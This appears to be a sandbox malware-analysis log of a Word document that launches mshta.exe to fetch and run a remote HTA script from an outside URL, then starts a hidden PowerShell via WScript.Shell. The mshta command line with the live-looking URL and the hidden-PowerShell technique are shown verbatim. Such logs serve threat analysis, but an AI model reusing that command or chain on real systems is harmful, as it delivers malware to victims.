| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x776e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = InitializeSRWLock, address_out = 0x778384f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = AcquireSRWLockExclusive, address_out = 0x77828020 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = AcquireSRWLockShared, address_out = 0x778254e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ReleaseSRWLockExclusive, address_out = 0x77828050 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ReleaseSRWLockShared, address_out = 0x778254b0 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x7fefde70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 6, address_out = 0x7fefde71320 |
|
1 | |
| System | Get Info | - |
|
2 | |
| Module | Get Handle | module_name = EXPLORER.EXE, base_address = 0x0 |
|
1 | |
| Module | Get Handle | module_name = IEXPLORE.EXE, base_address = 0x0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup, value_name = Print_Background |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 7, address_out = 0x7fefde71020 |
|
1 | |
| System | Get Cursor | x_out = 724, y_out = 422 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 8, address_out = 0x7fefde713f0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 |
|
1 | |
| COM | Create | interface = 08C0E040-62D1-11D1-9326-0060B067B86E, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD |
|
1 | |
| Window | Create | wndproc_parameter = 3266448 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| Module | Load | module_name = OLEACC.DLL, base_address = 0x7fef22f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleacc.dll, function = LresultFromObject, address_out = 0x7fef22f3aa8 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 724, y_out = 422 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 724, y_out = 422 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Get Info | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME |
|
1 | |
| Module | Load | module_name = ieframe.dll, base_address = 0x7fef2350000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = ieframe.dll, base_address = 0x7fef2350000 |
|
1 | |
| System | Get Time | type = Ticks, time = 131150 |
|
1 | |
| System | Get Time | type = Ticks, time = 131165 |
|
249 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Time | type = Ticks, time = 131181 |
|
1 | |
| COM | Create | interface = BB1A2AE1-A4F9-11CF-8F20-00805F2CD064, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Time | type = System Time, time = 2017-10-24 17:38:03 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 131228 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x7fefe1c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefe1e7490 |
|
1 | |
| COM | Create | interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Time | type = Ticks, time = 131243 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = 2, address_out = 0x7fefde73480 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefe1c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x7fefe1da4c4 |
|
1 | |
| COM | Get Class ID | cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WsCriPt.SHeLl |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoGetClassObject, address_out = 0x7fefe1f2e18 |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| System | Get Time | type = System Time, time = 2017-10-24 17:38:03 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 131462 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | module_name = IEXPLORE.EXE, process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 261 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x7fefe850000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shell32.dll, function = ShellExecuteExW, address_out = 0x7fefe877c70 |
|
1 | |
| Process | Create | process_name = C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe, show_window = SW_HIDE |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 | |
| System | Get Cursor | x_out = 724, y_out = 422 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 724, y_out = 422 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
6 | |
| System | Get Time | type = Ticks, time = 147686 |
|
1 | |
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| System | Get Time | type = Ticks, time = 147701 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID |
|
1 | |
| System | Get Time | type = Ticks, time = 147764 |
|
2 | |
| System | Get Cursor | x_out = 631, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 631, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 631, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 631, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 631, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Module | Load | module_name = oleaut32.dll, base_address = 0x7fefde70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VariantClear, address_out = 0x7fefde71180 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = 18446744073709551596, new_long = 262144 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 1 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 1 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 791, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 1 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x7feff5e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\wininet.dll, function = InternetUnlockRequestFile, address_out = 0x7feff5f70f4 |
|
1 | |
| Module | Get Handle | module_name = mscoree.dll, base_address = 0x0 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = mshtml.dll, base_address = 0x7fee0880000 |
|
1 | |
| System | Get Time | type = Ticks, time = 131134 |
|
1 | |
| System | Get Time | type = Ticks, time = 131150 |
|
2 | |
| System | Get Time | type = Ticks, time = 147686 |
|
1 |
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\system32\mshta.exe |
| Command Line | "C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0 |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:07, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:29 |
| Information | Value |
|---|---|
| PID | 0x370 |
| Parent PID | 0x9b0 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
628
0x
9C8
0x
744
0x
7D8
0x
9EC
0x
96C
0x
970
0x
974
0x
990
0x
984
0x
73C
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2017-10-24 17:38:03 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 131290 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\mshta.exe, base_address = 0xff9d0000 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x776e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x776fc4a0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32, data = C:\Windows\System32\mshtml.dll, type = REG_SZ |
|
1 | |
| Module | Load | module_name = C:\Windows\System32\mshtml.dll, base_address = 0x7fee0880000 |
|
1 | |
| System | Get Time | type = System Time, time = 2017-10-24 17:38:03 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 131415 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 |
|
1 | |
